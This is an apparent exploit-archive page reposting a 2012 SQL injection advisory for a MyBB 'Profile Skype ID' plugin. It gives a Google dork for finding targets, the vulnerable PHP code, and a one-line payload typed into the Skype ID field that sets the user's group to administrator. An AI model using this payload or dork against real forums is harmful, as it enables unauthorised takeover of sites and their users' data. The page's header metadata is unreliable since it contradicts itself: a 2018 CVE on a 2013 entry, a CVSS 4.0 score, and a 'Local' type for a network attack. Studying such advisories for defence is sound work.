Advertisement






MyBB plugin Profile Skype ID privilege escalation.

CVE Category Price Severity
CVE-2018-15961 CWE-269 $500 High
Author Risk Exploitation Type Date
Rastating High Local 2013-01-02
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.982773 0.996922

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2013010008

Below is a copy:

# Exploit Title: 
# Google Dork: intext:"Skype ID Skype ID:" inurl:member
# Date: 12.20.2012
# Exploit Author: Zixem
# Software Link: http://mods.mybb.com/view/user-profile-skype-id
# Version: 1.0
# Tested on: Linux.
----------------------------------------------
 
 
ProfileSkypeID plugin suffers from SQL Injection in UPDATE query.
The vulnerabillity exist within profileskype.php which located in /inc/plugins/ folder.
 
<?php
$plugins->add_hook("datahandler_user_update", "profileskype_update");    /*Line 15*/
 
function profileskype_update($skype)                                    /*Line 167*/
{
  global $mybb;
 
  if (isset($mybb->input['skype']))
   {
      $skype->user_update_data['skype'] = $mybb->input['skype'];
   }
}
 
?>
 
How to exploit:
(1) Go to usercp.php?action=profile
(2) Insert this following string in your Skype ID: zix', usergroup='4
(3) Have some fun, you're an admin.
 
 
Proof of concept:
(1) Writing the injection: http://i.imgur.com/hg3FW.png
(2) Updates the profile and waiting a few seconds: http://i.imgur.com/fkwdi.png
(3) You're an admin: http://i.imgur.com/JIkRX.png
 
 
----------------------------------------------
[*] Follow for more: http://twitter.com/z1xem
[*] http://zixem.altervista.org/
[*] http://zentrixplus.net/

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum